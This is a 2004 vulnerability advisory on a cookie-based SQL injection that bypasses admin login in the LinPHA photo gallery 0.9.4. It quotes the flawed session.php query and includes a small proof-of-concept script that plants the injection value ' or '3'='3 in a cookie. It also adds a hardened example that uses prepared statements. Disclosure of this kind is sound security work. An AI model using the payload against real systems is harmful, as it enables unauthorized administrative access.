/////////////////////////////////////////////////////
//// Vulnerable Program: Linpha
//// Url: http://linpha.sf.net
//// Version: 0.9.4 Latest version
//// Date: Today, July 28 of 2004
//// Author: Fernando Quintero (a.k.a nonroot)
//// Email: nando@xxxxxxxxxxx
//////////////////////////////////////////////////////

I. Affected software description

LinPHA is an easy to use, multilingual, flexible photo/image archive/album/gallery written in PHP. It uses a SQL database to store information about your pictures. It comes with an HTML based installer, so you don't need experience in setting up a SQL DB.

II. Bug

There is a bug in the code that allows a possible attacker to bypass the authentication of the linpha admin. It can be done without using a password: you only have to modify the cookies of the session and then browse to the admin.php script.

The bug is located approximately at line [25] of the session.php file:

1. SQL injection allows bypassing the auth

    // Read Cookie
    24 if(read_config('autologin')) {
    25     if(!isset($_SESSION['user_name']) && isset($_COOKIE["linpha_userid"]) && $_COOKIE["linpha_userid"]!="" && isset($_COOKIE["linpha_password"]) && $_COOKIE["linpha_password"]!="")
    26     {
    27         $query_username = $GLOBALS['db']->Execute("SELECT nickname, level, groups FROM ".PREFIX."users ".
    28             "WHERE ID = '".$_COOKIE["linpha_userid"]."' AND ".
    29             "password = '".$_COOKIE["linpha_password"]."'");
    30
    31         if($row = $query_username->FetchRow())
    32         {
    33             $_SESSION["REMOTE_ADDR"] = @$_SERVER["REMOTE_ADDR"];
    34             $_SESSION["user_name"] = $row[0];
    35             $_SESSION["user_pass"] = $_COOKIE["linpha_password"];
    36             $_SESSION["user_level"] = $row[1]; // Store user level
    37             $_SESSION["user_groups"] = $row[2]; // Store user group membership
    38         }
    39         else // wrong cookie
    40         {
    41             setcookie("linpha_userid"); // delete cookie linpha_userid
    42             setcookie("linpha_password"); // delete cookie linpha_password
    43         }
    44     }
    45 }

There are two cookies that are validated: linpha_userid and linpha_password.
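For comparison with the block above, a hardened form of the same autologin check, written as an added example for this page (it is not LinPHA's own fix, which is not shown here). It assumes a PDO handle $pdo, the same PREFIX."users" table with columns ID, nickname, level, groups and password, and that the linpha_password cookie carries the value stored in the password column; these are assumptions about the schema, not taken from the advisory.

```php
<?php
// Added example (not LinPHA's code): hardened replacement for the cookie
// autologin block in session.php. Assumes a PDO handle $pdo and the table
// PREFIX."users" with columns ID, nickname, level, groups, password.

function linpha_cookie_autologin(PDO $pdo)
{
    if (isset($_SESSION['user_name'])) {
        return false; // already logged in, nothing to do
    }
    $userid = isset($_COOKIE['linpha_userid']) ? $_COOKIE['linpha_userid'] : '';
    $secret = isset($_COOKIE['linpha_password']) ? $_COOKIE['linpha_password'] : '';

    // Check 1: the user id must be a plain positive integer. Quotes, spaces
    // or any SQL fragment are rejected before the value reaches the query.
    if (!ctype_digit($userid) || $secret === '') {
        linpha_forget_cookies();
        return false;
    }

    // Check 2: look the user up by id only, through a bound parameter, so
    // the cookie content is data, never part of the SQL text. This does not
    // depend on magic_quotes being on or off.
    $stmt = $pdo->prepare(
        'SELECT nickname, level, groups, password FROM ' . PREFIX . 'users WHERE ID = :id'
    );
    $stmt->execute(array(':id' => (int) $userid));
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // Check 3: compare the cookie secret with the stored value in PHP, in
    // constant time, instead of letting the database evaluate "password = '...'".
    if ($row === false || !hash_equals((string) $row['password'], $secret)) {
        linpha_forget_cookies();
        return false;
    }

    $_SESSION['REMOTE_ADDR'] = isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : '';
    $_SESSION['user_name']   = $row['nickname'];
    $_SESSION['user_level']  = $row['level'];
    $_SESSION['user_groups'] = $row['groups'];
    return true;
}

function linpha_forget_cookies()
{
    // Expire both cookies on the same path the original code set them for.
    setcookie('linpha_userid', '', time() - 3600, '/linpha');
    setcookie('linpha_password', '', time() - 3600, '/linpha');
}
```

The example deliberately stops copying the cookie password into $_SESSION, and a persistent cookie carrying a random server-side token would be a better autologin design than one carrying the password value at all.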
So, I would get in without a password if I inject those cookies. I wrote these lines in a test.php:

    1 <?PHP
    2 setcookie("linpha_userid","1",time()+86400*365,'/linpha');
    3 setcookie("linpha_password","' or '3'='3",time()+86400*365,'/linpha');
    4 ?>

The script is loaded before the admin.php file, then the new cookies will inject the query at [29]. This is possible if the magic_quotes variable is set to Off in the php.ini, but anyway, these cookies should be checked before using them in the query.

ok, That's it!

III. Solution

The main coder was contacted and the code was fixed in the cvs ;).

IV. Greetings

- Greets to GIGAX people, Sandra195 specially
- Greets to all the community. I learn from you!

V. Contact

Fernando Quintero
nando@xxxxxxxxxxx
Medellín-Colombia

VI. Final words

!!! Viva Colombia !!!!!!!!